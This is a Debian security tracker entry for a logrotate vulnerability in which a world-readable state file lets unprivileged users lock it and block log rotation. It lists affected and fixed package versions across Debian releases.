DescriptionA vulnerability was found in logrotate in how the state file is created. The state file is used to prevent parallel executions of multiple instances of logrotate by acquiring and releasing a file lock. When the state file does not exist, it is created with world-readable permission, allowing an unprivileged user to lock the state file, stopping any rotation. This flaw affects logrotate versions before 3.20.0.
SourceCVE (at NVD; CERT, LWN, oss-sec, fulldisc, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, GitHub advisories/code/issues, web search, more)
Debian Bugs1011644

Vulnerable and fixed packages

The table below lists information on source packages.

Source PackageReleaseVersionStatus
logrotate (PTS)buster3.14.0-4fixed
sid, trixie, bookworm3.21.0-1fixed

The information below is based on the following data on fixed versions.

PackageTypeReleaseFixed VersionUrgencyOriginDebian Bugs
logrotatesourcestretch(not affected)
logrotatesourcebuster(not affected)


[buster] - logrotate <not-affected> (Vulnerable code introduced later)
[stretch] - logrotate <not-affected> (Vulnerable code introduced later)
Introduced by: (3.17.0)
Fixed by: (3.20.0)
Fixed by: (3.20.1)
Packages are built with --with-state-file-path=/var/lib/logrotate/status
but /var/lib/logrotate has 0755 permissions, allowing a user to aquire a lock on the file.

Search for package or bug name: Reporting problems